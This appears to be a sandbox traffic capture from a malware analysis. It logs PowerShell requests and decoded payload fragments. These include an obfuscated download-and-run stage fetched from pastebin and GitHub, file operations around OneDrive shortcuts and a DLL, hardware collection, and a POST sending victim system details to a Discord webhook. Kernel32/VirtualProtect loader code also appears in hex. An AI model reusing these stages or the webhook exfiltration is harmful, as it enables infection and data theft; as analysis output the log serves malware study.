2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30
Data Ascii: x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x29, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 34 42 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 33 33 2c 20 30 78 30 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78
Data Ascii: 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x74, 0x00, 0x28, 0x00, 0x4B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x62, 0x
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20
Data Ascii: E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x74, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x2C, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C,
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 78 34 37 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30
Data Ascii: x47, 0x00, 0x65, 0x00, 0x74, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x28, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 35 41 2c 20 30 78 30 30 2c 20 30 78
Data Ascii: 0x20, 0x00, 0x28, 0x00, 0x68, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x2E, 0x00, 0x5A, 0x00, 0x
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20
Data Ascii: 0, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00,
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 35 2c 20 30 78 30 30 2c 20 30 78 37 38 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30
Data Ascii: x00, 0x20, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x20, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x65, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49718 | 172.67.19.24 | 443 | 5812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:10 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 13:54:11 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:54:10 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 100
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304cb28d70c86f-DFW
2024-10-15 13:54:11 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 13:54:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49720 | 185.199.111.133 | 443 | 5812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:12 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:54:12 UTC | 901 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:12 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210151-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000452.382712,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: bcb4039462a3588f121cf9948f927dce3ec85cab
Expires: Tue, 15 Oct 2024 13:59:12 GMT
Source-Age: 99
2024-10-15 13:54:12 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
2024-10-15 13:54:12 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 13:54:12 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 13:54:12 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 13:54:12 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 13:54:12 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                     Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                     6          | 192.168.2.9 | 49722       | 162.159.138.232 | 443              | 4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                     Timestamp               | Bytes transferred | Direction | Data
                                                                                     2024-10-15 13:54:18 UTC | 311               | OUT       | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 295
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:18 UTC295OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 54 50 35 53 45 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FAL
                                                                                     2024-10-15 13:54:18 UTC | 1358              | IN        | HTTP/1.1 204 No Content
                                                                                    Date: Tue, 15 Oct 2024 13:54:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    set-cookie: __dcfduid=f8e289c28afc11ef8e220e9eb858adde; Expires=Sun, 14-Oct-2029 13:54:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729000459
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA%2FoXDYof%2FVbpdVVwaX%2B0w6FO5X0mj17nf6Onxsd8dZZ1f3vz89Lo5skk29Votokm%2Bflqu6hUZyban1ctXKKaLb2Vi61Hnvq6DSZihf2%2FaMBIalRPW5cn8FUUwkB"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: __sdcfduid=f8e289c28afc11ef8e220e9eb858adde00662a2be4acc4e530ebc9a645c8d108950f0aa236c218456bcdd9af0367487f; Expires=Sun, 14-Oct-2029 13:54:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    Set-Cookie: __cfruid=c81e61d1b1beef6247582d9bf320c51e0fea5da6-1729000458; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    2024-10-15 13:54:18 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 49 36 4f 6d 77 5f 59 61 4a 37 68 50 62 47 37 7a 75 44 48 6e 58 44 5f 68 55 36 41 69 79 72 2e 39 75 74 49 54 76 54 74 64 62 35 41 2d 31 37 32 39 30 30 30 34 35 38 33 39 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 65 30 30 39 39 38 36 62 36 31 2d 44 46 57 0d 0a 0d 0a
